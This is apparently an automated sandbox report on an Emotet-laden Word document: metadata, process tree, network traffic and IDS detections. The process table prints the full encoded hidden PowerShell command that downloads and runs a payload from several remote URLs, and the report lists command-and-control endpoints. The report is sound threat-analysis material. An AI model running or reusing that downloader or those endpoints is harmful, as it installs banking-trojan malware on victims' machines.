File name: | X.doc |
Full analysis: | https://app.any.run/tasks/e73929a0-590e-465c-aba9-544f799acadf |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 07, 2019, 00:19:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Quia rem et., Author: Deniz Benninger, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 5 17:53:00 2019, Last Saved Time/Date: Thu Dec 5 17:53:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 337, Security: 0 |
MD5: | 6F667CFF32EC075F0FBDB33EF6CD2016 |
SHA1: | 4ABC63E3FAF07810397873811F7D093F801C786E |
SHA256: | 77094CD1BD3D8D429AD652583B4CDB2A101608AE698729BFFBA8468B0BAC06E6 |
SSDEEP: | 6144:sWwmP3WbeJzUO62k4qtGiL3HJkWyD7b1bvDT:sWwmP3WbeJzUO6bQitkB7bB7T |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Quia rem et. |
---|---|
Subject: | - |
Author: | Deniz Benninger |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:12:05 17:53:00 |
ModifyDate: | 2019:12:05 17:53:00 |
Pages: | 1 |
Words: | 58 |
Characters: | 337 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 2 |
Paragraphs: | 1 |
CharCountWithSpaces: | 394 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 25 |
CompObjUserType: | Microsoft Forms 2.0 Form |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
640 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\X.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3792 | powershell -w hidden -en JABaAGEAYgBwAHIAYwBqAGYAPQAnAEEAYQBvAGUAZwBzAHUAagBmAGoAJwA7ACQAVgBpAG0AcQBoAGEAdgB3ACAAPQAgACcANAA5ADMAJwA7ACQAUgBlAHIAYwBnAHkAeAB3AD0AJwBNAGQAagBpAGkAcAB0AGUAagB6AGIAYQB1ACcAOwAkAEsAawB4AGgAdgBuAHAAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVgBpAG0AcQBoAGEAdgB3ACsAJwAuAGUAeABlACcAOwAkAEsAcABmAGwAcgB4AG4AdwB5AD0AJwBBAGEAYwBnAGMAbQBwAGMAYgBiACcAOwAkAFkAZABjAGIAbQB2AHAAcgBxAGcAbQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBFAFQALgB3AEUAQgBjAEwAaQBFAE4AdAA7ACQASQBnAGIAZwBxAGQAcwByAD0AJwBoAHQAdABwAHMAOgAvAC8AaABhAGIAZQByAC4AcgBhAG4AawBoAGkAZwBoAC4AYwBhAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGoAbQBkAHYALQBkAG4AcgBnADAALQAyADkANwAvACoAaAB0AHQAcAA6AC8ALwBzAGcAcwB1AG4AZgBsAG8AdwBlAHIALgBlAGQAdQAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAGkAbgBjAGwAdQBkAGUAcwAvAFoAdwB6AFIAcgBvAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AcwB0AHUAZABpAG8AdAB1AGwAbABpAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBrADAAMQAzAC0AcgBoAGoAegB5AGYAZQAtADEAOQAxADYAMQAzADYANAA3AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGMAdQBiAHIAYQAuAGUAbgBzAC4AZQBkAHUALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARgBUAGEAUABwAE4AVABYAC8AKgBoAHQAdABwAHMAOgAvAC8AYQBjAGEAZABlAG0AaQBhAG0AbwBuAHMAdABlAHIALgBjAG8AbQAuAGIAcgAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB5AHMAeQBPAEoARABZAGcAbgAvACcALgAiAFMAUABgAEwASQB0ACIAKAAnACoAJwApADsAJABNAHUAbQBmAGMAZABhAHIAawB4AD0AJwBKAHMAawB0AGIAegBnAGwAeQB5AHAAdABiACcAOwBmAG8AcgBlAGEAYwBoACgAJABCAGMAbQB0AGEAYQBvAHgAZwB4AHMAaABmACAAaQBuACAAJABJAGcAYgBnAHEAZABzAHIAKQB7AHQAcgB5AHsAJABZAGQAYwBiAG0AdgBwAHIAcQBnAG0ALgAiAEQAbwBgAFcAbgBMAG8AYABBAGQAYABGAEkATABFACIAKAAkAEIAYwBtAHQAYQBhAG8AeABnAHgAcwBoAGYALAAgACQASwBrAHgAaAB2AG4AcAB6ACkAOwAkAE8AbABzAHMAZwBuAGYAcwByAGUAcgBrAHMAPQAnAEEAZABnAGcAdwBqAGIAdgBhAGMAdQBrACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASwBrAHgAaAB2AG4AcAB6ACkALgAiAEwAYABlAGAATgBnAHQASAAiACAALQBnAGUAIAAyADgANgA1ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGAAQQBSAFQAIgAoACQASwBrAHgAaAB2AG4AcAB6ACkAOwAkAFMAZAB6AGcAbQBnAHIAZQBuAD0AJwBaAHMAcABqAG8AbwBvAGYAeQAnADsAYgByAGUAYQBrADsAJABWAGcAbgBtAHAAcwBxAG0AYwB1AGYAPQAnAE8AbABtAGwAbQBpAHkAcwB4AHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBxAG4AZwB3AGYAcABzAGYAaQA9ACcAWgByAHkAbwBhAGYAawB1AGYAYwB2AGQAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3772 | "C:\Users\admin\493.exe" | C:\Users\admin\493.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: OPENGL MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2428 | --956a31ec | C:\Users\admin\493.exe | 493.exe | |
User: admin Integrity Level: MEDIUM Description: OPENGL MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3976 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 493.exe |
User: admin Integrity Level: MEDIUM Description: OPENGL MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3628 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | serialfunc.exe | |
User: admin Integrity Level: MEDIUM Description: OPENGL MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA969.tmp.cvr | — | |
MD5:— | SHA256:— | |||
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0B5C21B.wmf | — | |
MD5:— | SHA256:— | |||
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59349D60.wmf | — | |
MD5:— | SHA256:— | |||
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCC03DE1.wmf | — | |
MD5:— | SHA256:— | |||
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D963CA6E.wmf | — | |
MD5:— | SHA256:— | |||
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91771B97.wmf | — | |
MD5:— | SHA256:— | |||
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89C990AC.wmf | — | |
MD5:— | SHA256:— | |||
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6FACE0BD.wmf | — | |
MD5:— | SHA256:— | |||
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FC7B79A.wmf | — | |
MD5:— | SHA256:— | |||
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE55AED3.wmf | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3628 | serialfunc.exe | POST | — | 149.202.153.251:8080 | http://149.202.153.251:8080/JfWBPbVrcaPutvmU | FR | — | — | malicious |
3628 | serialfunc.exe | POST | 200 | 149.202.153.251:8080 | http://149.202.153.251:8080/8uah8J99TRr | FR | binary | 148 b | malicious |
3628 | serialfunc.exe | POST | 200 | 172.90.70.168:443 | http://172.90.70.168:443/zDwi5Ybu | US | binary | 1.38 Mb | malicious |
3628 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/t0MtYkBZGtOezDQ | unknown | binary | 138 Kb | malicious |
3628 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/qLzpxpQru6mgQwqrAL | unknown | binary | 138 Kb | malicious |
3628 | serialfunc.exe | POST | 200 | 82.145.43.153:8080 | http://82.145.43.153:8080/MCbD8G5 | GB | binary | 684 Kb | malicious |
3628 | serialfunc.exe | POST | 200 | 92.119.123.10:8080 | http://92.119.123.10:8080/XqZiK | unknown | binary | 138 Kb | malicious |
3628 | serialfunc.exe | POST | — | 92.119.123.10:8080 | http://92.119.123.10:8080/AJ506QCvsmuDbNpYI | unknown | — | — | malicious |
3628 | serialfunc.exe | POST | 200 | 172.90.70.168:443 | http://172.90.70.168:443/LXJBRyrvnrWp | US | binary | 148 b | malicious |
3628 | serialfunc.exe | POST | 200 | 149.202.153.251:8080 | http://149.202.153.251:8080/E8PGmm | FR | binary | 684 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3628 | serialfunc.exe | 172.90.70.168:443 | — | Time Warner Cable Internet LLC | US | malicious |
3792 | powershell.exe | 18.212.128.71:443 | haber.rankhigh.ca | — | US | unknown |
3628 | serialfunc.exe | 92.119.123.10:8080 | — | — | — | malicious |
3628 | serialfunc.exe | 199.79.63.31:465 | mail.expervia.in | PDR | US | suspicious |
3628 | serialfunc.exe | 195.201.105.237:587 | mail.gmsworldwide.com | Awanti Ltd. | RU | unknown |
3628 | serialfunc.exe | 197.221.1.10:25 | mail.hyundaiodn.co.za | HETZNER | ZA | unknown |
3628 | serialfunc.exe | 148.81.188.196:465 | poczta.vizja.pl | Naukowa I Akademicka Siec Komputerowa Instytut Badawczy | PL | unknown |
3628 | serialfunc.exe | 212.227.15.177:587 | pop.1und1.com | 1&1 Internet SE | DE | unknown |
3628 | serialfunc.exe | 212.227.15.171:587 | imap.1und1.de | 1&1 Internet SE | DE | unknown |
3628 | serialfunc.exe | 82.57.200.129:587 | in.alice.it | Telecom Italia | IT | unknown |
Domain | IP | Reputation |
---|---|---|
haber.rankhigh.ca |
| unknown |
pop.bizmail.yahoo.com |
| shared |
mail.hyundaiodn.co.za |
| unknown |
poczta.vizja.pl |
| unknown |
mail.website.bg |
| unknown |
mail.expervia.in |
| suspicious |
imap.1und1.de |
| shared |
pop.capeletting.com |
| unknown |
imap.gmail.com |
| shared |
mail.gmsworldwide.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3628 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
3628 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
3628 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3628 | serialfunc.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3628 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3628 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3628 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5 |
3628 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6 |
3628 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3628 | serialfunc.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |